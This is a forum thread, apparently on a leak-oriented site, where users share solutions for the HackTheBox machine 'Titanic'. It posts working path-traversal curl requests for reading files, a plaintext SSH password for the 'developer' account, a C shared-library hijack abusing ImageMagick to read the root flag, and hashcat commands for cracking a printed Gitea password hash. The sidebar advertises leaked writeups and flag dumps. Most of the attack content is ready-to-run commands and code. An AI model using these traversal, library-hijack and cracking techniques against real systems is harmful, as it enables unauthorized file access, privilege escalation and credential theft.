Possibly Related Threads…

breached_idn · Feb 16, 2025, 01:06 AM

how did you know the location of gitea.db?

samuelballsiu1 · Feb 16, 2025, 01:24 AM

(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

Check the gitea config repository of the developer and google

mt01 · Feb 16, 2025, 03:24 AM

I am still confused as to how we did the root thing

breached_idn · Feb 16, 2025, 03:46 AM

(Feb 16, 2025, 01:24 AM)samuelballsiu1 Wrote:
(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

Check the gitea config repository of the developer and google

sorry silly mistakes try to bruteforce dirsearch where the dev subdomain is certainly open

next question.. how to find any clue for priv esc? i'm running linpeas but not found interesting.

greenfire · Feb 16, 2025, 03:46 AM

(Feb 15, 2025, 07:17 PM)LostGem Wrote: user flag
curl --path-as-is -s -k "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/user.txt"

curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: titanic.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://titanic.htb/' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Priority: u=0, i' \
$'http://titanic.htb/download?ticket=/home/developer/user.txt'

Copied from burp. Directly point ticket=/home/developer/user.txt works.

vanatka123 · Feb 16, 2025, 05:10 AM

(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

read docker-compose.yml

marc4442 · Feb 16, 2025, 12:14 PM

(Feb 15, 2025, 07:58 PM)LostGem Wrote: userflag

curl --path-as-is -s -k "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/user.txt"
ssh creds for developer
developer : 25282528

Root!

cd /opt/app/static/assets/images
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
system("cat /root/root.txt > /tmp/root.txt");
exit(0);
}
EOF

cp entertainment.jpg root.jpg

cat /tmp/root.txt

How did you find this vulnerability?

newacc0 · Feb 16, 2025, 12:50 PM

Quote:How did you find this vulnerability?

After finding that script, check magick version and google for vulns, read CVE description and you are ready to go

0x410x420x41 · Feb 16, 2025, 01:17 PM

So the script in /opt/scripts and the custom PATH for the developer user were only rabbit holes ?

Gattsu_berk_1421 · (This post was last modified: Feb 16, 2025, 04:39 PM by Gattsu_berk_1421.)

For me, hashcat doesnt like the format the hashes are in after gitea2hashcat.py script. What is the correct format for the hashes?

For anyone thats having similar issues:

cat developer_hash.txt
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

hashcat -m 10900 --force developer_hash.txt /usr/share/wordlists/rockyou.txt

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	396	99,317	1 hour ago Last Post: 0xlc13n
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	107	10,288	1 hour ago Last Post: 0xlc13n
	[FREE] CPTS • CWES • CDSA • CWEE Exam Hint	3midjets	235	33,264	1 hour ago Last Post: 0xlc13n
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	608	96,206	11 hours ago Last Post: breachaddictt
	[FREE] HackTheBox All Cheatsheets	Tamarisk	30	1,880	11 hours ago Last Post: breachaddictt